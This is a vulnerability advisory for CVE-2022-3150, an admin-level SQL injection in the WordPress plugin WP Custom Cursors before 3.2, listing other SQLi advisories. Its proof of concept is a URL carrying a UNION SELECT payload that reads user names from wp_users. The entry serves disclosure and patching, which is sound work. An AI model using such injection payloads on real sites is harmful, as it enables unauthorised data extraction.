WP Custom Cursors < 3.2 – Admin+ SQLi | CVE 2022-3150 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin

Proof of Concept

As admin, open https://example.com/wp-admin/admin.php?page=wpcc_add_new&edit_row=-1+UNION+select+1,1,1,1,user_login,1,1,1,1,1,1,1,1,1,1,1+from+wp_users

Select “Text Cursor”, and the user's name will be in the input field

Affects Plugins

wp-custom-cursors

Fixed in 3.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

bb0806d7-21e3-4a65-910c-bf0625c338ec

Timeline

Publicly Published

2022-09-21 (about 3 years ago)

Added

2022-09-21 (about 3 years ago)

Last Updated

2023-06-30 (about 2 years ago)

Other

Published

Title

Published

2024-12-05

Title

KiviCare – Clinic & Patient Management System (EHR) < 3.6.5 - Authenticated (Doctor/Receptionist+) SQL Injection

Published

2019-05-20

Title

FV Flowplayer Video Player < 7.3.15.727 - SQL Injection

Published

2015-04-13

Title

WordPress Video Gallery <= 2.8 - SQL Injection

Published

2016-11-12

Title

WP eCommerce <= 3.11.3 - SQL Injection in sessionid

Published

2017-08-08

Title

Loginizer <= 1.3.5 - Blind SQL Injection